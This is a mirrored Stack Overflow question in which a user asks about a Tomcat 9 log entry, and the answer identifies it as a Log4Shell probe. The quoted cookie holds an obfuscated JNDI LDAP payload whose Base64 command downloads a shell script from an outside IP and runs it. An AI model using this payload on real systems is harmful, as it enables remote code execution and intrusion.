'Tomcat 9: cookie attack?

From Tomcat9 catalina log:

org.apache.tomcat.util.http.parser.Cookie.logInvalidHeader A cookie 
header was received [('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-
l}dap${env:BARFOO:-:}//ip:1389/TomcatBypass/Command/Base64/Y2QgL3
RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaH
R0cDovLzE2Ny45OS40OS4xMzIvOFVzQS5zaDsgY3VybCAtTyBodHRwOi8vMTY3Ljk5LjQ5LjEzMi
84VXNBLnNoOyBjaG1vZCA3NzcgOFVzQS5zaDsgc2ggOFVzQS5zaA==}')] that contained an
invalid cookie. That cookie will be ignored.

What is the cookie? Is it an attack?

tomcatcookiestomcat9


Solution 1:[1]

This is a probe of your installation for the Log4Shell attack.

By default - Tomcat is immune to the attack.

But you could still could be subject to the attack if you (in your custom webapp) use an vulnerable log4j version.

Sources

This article follows the attribution requirements of Stack Overflow and is licensed under CC BY-SA 3.0.

Source: Stack Overflow

Solution Source
Solution 1 Tim Funk

Related Questions

How to SHUTDOWN Tomcat in Ubuntu?

log4j writing to console but not to file (Liferay + Tomcat)

Force log rollover in tomcat log4j2 even if no traffic

java.util.concurrent.ExecutionException: org.apache.catalina.LifecycleException: Failed to start

Tomcat doesn't start with YAWL engine

How do I map Spring MVC controller to a uri with and without trailing slash?

Tomcat Credentials

How to set custom environment variables in tomcat?

JSTL error javax/servlet/jsp/jstl/core/LoopTag error when using c:forEach tomcat ver7.0 [duplicate]

Tomcat does not start. Where was I wrong?

Unknown version of Tomcat was specified with tomcat -9.0.37

Customize keycloak error page with spring boot

Restart Tomcat Service on AWS EC2 instance, on a schedule

Spark saveAsTextFile() results in Mkdirs failed to create for half of the directory

Tomcat Manager - Active Directory Authentication